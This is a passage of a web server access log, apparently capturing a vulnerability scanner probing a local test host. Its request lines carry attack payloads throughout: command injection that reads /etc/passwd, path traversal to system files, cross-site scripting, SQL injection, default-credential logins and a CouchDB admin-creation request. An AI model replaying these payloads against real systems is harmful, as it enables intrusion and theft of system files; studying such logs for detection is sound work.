HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /mt.cgi HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /home.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /install/lib/ajaxHandlers/ajaxServerSettingsChk.php?rootUname=%3b%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%20%23 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/edit.php?post_type=wcps&page=import_layouts&keyword=\x22onmouseover%3Dalert%28document.domain%29%3B%2F%2F HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/category-grid-view-gallery/includes/CatGridPost.php?ID=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.019","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /settings.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login.htm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:50 +0000","request_body":"{\x22contentId\x22:\x22786457\x22,\x22macro\x22:{\x22name\x22:\x22widget\x22,\x22body\x22:\x22\x22,\x22params\x22:{\x22url\x22:\x22https://www.viddler.com/v/23464dc5\x22,\x22width\x22:\x221000\x22,\x22height\x22:\x221000\x22,\x22_template\x22:\x22../web.xml\x22}}}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /rest/tinymce/1/macro/preview HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ftb.imagegallery.aspx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /report/ReportServer?op=chart&cmd=get_geo_json&resourcepath=privilege.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /static/ HTTP/1.1","status":"403","body_bytes_sents":"187","req_time":"0.019","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:50 +0000","request_body":"email='+or+2>1+--+&password=&login=","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /scrm/crm/admin HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /loyalty_enu/start.swe/%3E%22%3E%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:50 +0000","request_body":"{\x22grant_type\x22:\x22password\x22,\x22username\x22:\x22root\x22,\x22password\x22:\x225iveL!fe\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /oauth/token HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:50 +0000","request_body":"content1=&button=%E6%8F%90%E4%BA%A4%E5%86%85%E5%AE%B9","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /kindeditor/php/demo.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.020","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /php/device_graph_page.php?device_id=%22zlo%20onerror=alert(1)%20%22 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:50 +0000","request_body":"username=showdoc&password=123456&v_code=","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /server/index.php?s=/api/user/login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /hosts HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pyproject.toml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webadmin/reporter/view_server_log.php?server=localhost&act=stats&filename=&offset=1&count=1000&sortorder=&log=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&offset=&sortitem=&filter= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:50 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /js/elfinder.min.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:50 +0000","request_body":"{\x0D\x0A \x22type\x22: \x22user\x22,\x0D\x0A \x22name\x22: \x22poc\x22,\x0D\x0A \x22roles\x22: [\x22_admin\x22],\x0D\x0A \x22roles\x22: [],\x0D\x0A \x22password\x22: \x22123456\x22\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"PUT /_users/org.couchdb.user:poc HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"PUT", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dana-na/auth/url_default/welcome.cgi HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:50 +0000","request_body":"sec=requestpass&email=test%40test.com%22%3e%3cimg%20src%3da%20onerror%3dalert(document.domain)%3e11&code=AAAAA&login=","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /seo/seopanel/login.php?sec=forgot HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /etc/designs/xh1x.childrenlist.json//%3Csvg%20onload=alert%28document.domain%29%3E.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /status.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin-ajax.php?action=0776a6f87a8143af12c1e7bbd0bf4197 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:50 +0000","request_body":"{\x22grant_type\x22:\x22password\x22,\x22username\x22:\x22root\x22,\x22password\x22:\x22123456789\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /oauth/token HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:50 +0000","request_body":"content1=&button=%E6%8F%90%E4%BA%A4%E5%86%85%E5%AE%B9","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /php/demo.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /embed.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /artifactory/ui/repodata?deploy=true HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:50 +0000","request_body":"","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /sysmgmt/2015/bmc/session HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dbconsole/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:50 +0000","request_body":"command1=shell%3Acat /etc/passwd|dd of=/tmp/poc.txt","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /(download)/tmp/poc.txt HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /password.jsn HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin.php?page=snippets&snippets-safe-mode%5B0%5D=%22+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28document.domain%29+x%3D HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /js/elFinder.version.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /common/download/resource?resource=/profile/../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/easy-media-gallery-pro/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dana-na/auth/url_2/welcome.cgi HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /server-status HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"127.0.0.1"} +{"@timestamp": "13/May/2022:16:32:50 +0000","request_body":"{\x22grant_type\x22:\x22password\x22,\x22username\x22:\x22admin\x22,\x22password\x22:\x225iveL!fe\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /oauth/token HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin-ajax.php?action=dff1db99c9ecc3c645a4239e20e8ba32 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /apiclient/index.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?wsdl HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /WebConsole/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /h2-console/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/gtranslate/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /names.nsf/People?OpenView HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /auth/?next=%2F HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /common/download/resource?resource=/profile/../../../../Windows/win.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /brightmail/servlet/com.ve.kavachart.servlet.ChartStream?sn=../../WEB-INF/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dana-na/auth/url_3/welcome.cgi HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.019","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /..%5cetc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 